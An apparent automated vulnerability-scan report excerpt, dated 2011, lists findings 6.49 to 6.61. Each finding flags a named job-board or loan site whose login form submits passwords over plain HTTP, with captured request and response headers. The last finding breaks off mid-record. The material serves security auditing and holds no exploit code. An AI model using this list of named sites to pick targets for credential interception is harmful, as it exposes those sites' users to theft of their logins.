6.49. http://www.facilitiescrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.facilitiescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.50. http://www.financialservicescrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.financialservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.51. http://www.foodservicescrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.foodservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.52. http://www.fundraisingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.fundraisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.53. http://www.giscrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.giscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.54. http://www.governmentcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.governmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.55. http://www.graduateschoolloans.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.graduateschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...
<table cellspacing="0" cellpadding="1" border="0">
<form action="/index.php" name="formaccountlogin" method="post">
           <input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

6.56. http://www.healthcarecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.healthcarecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.57. http://www.helpdeskcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.helpdeskcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.58. http://www.hospitalitycrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hospitalitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.59. http://www.hrcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hrcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.60. http://www.hvaccrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hvaccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.61. http://www.informationtechnologycrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
